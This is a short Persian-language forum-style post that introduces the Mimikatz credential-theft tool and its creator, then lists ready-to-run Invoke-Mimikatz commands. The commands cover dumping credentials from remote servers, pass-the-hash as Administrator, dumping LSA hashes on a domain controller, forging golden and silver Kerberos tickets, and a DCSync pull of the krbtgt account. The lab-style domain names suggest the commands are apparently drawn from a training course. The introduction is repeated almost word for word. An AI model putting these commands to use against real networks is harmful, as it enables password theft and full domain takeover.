Mimikatz یک ابزار اکسپلویت در ویندوز است که رمزهای عبور ذخیره شده در حافظه را استخراج میکند.
این برنامه توسط برنامهنویس فرانسوی بنجامین دلپی ساخته شده است و در زبان عامیانه فرانسوی به معنای "گربههای زیبا" است.
بنجامین دلپی نقصی را در مایکروسافت ویندوز کشف کرد که هم یک کپی رمزنگاری شده از یک رمز عبور را استخراج میکند و هم کلیدی که میتواند برای رمزگشایی آن در حافظه در یک زمان مورد استفاده قرار گیرد.
او در سال 2011 با مایکروسافت تماس گرفت تا این نقص را گزارش کند.
دلپی متوجه شد که این نقص میتواند برای دسترسی به ماشینهای غیرقابل نفوذ در شبکه از طریق یک ماشین آسیبپذیر استفاده شود.
او اولین نسخه از این نرم افزار را در 2 May منتشر کرد.
دستورات :
Over Pass The Hash
Dump Hashes
Creating Tickets
Create A Golden Ticke
Create A Silver Ticket
DCSync Attack
این برنامه توسط برنامهنویس فرانسوی بنجامین دلپی ساخته شده است و در زبان عامیانه فرانسوی به معنای "گربههای زیبا" است.
بنجامین دلپی نقصی را در مایکروسافت ویندوز کشف کرد که هم یک کپی رمزنگاری شده از یک رمز عبور را استخراج میکند و هم کلیدی که میتواند برای رمزگشایی آن در حافظه در یک زمان مورد استفاده قرار گیرد.
او در سال 2011 با مایکروسافت تماس گرفت تا این نقص را گزارش کند.
دلپی متوجه شد که این نقص میتواند برای دسترسی به ماشینهای غیرقابل نفوذ در شبکه از طریق یک ماشین آسیبپذیر استفاده شود.
او اولین نسخه از این نرم افزار را در 2 May منتشر کرد.
دستورات :
Dump Creds
کد:
Invoke-Mimikatz -DumpCreds Invoke-Mimikatz -DumpCreds -ComputerName @("server1","server2")
کد:
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlm_hash> /run:powershell.exe"[/LEFT]
Dump Hashes
کد:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Creating Tickets
Create A Golden Ticke
کد:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_SID> /krbtgt:<NTLM_hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Create A Silver Ticket
کد:
[LEFT]Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"' [/LEFT]
DCSync Attack
DA privileges required!
کد:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'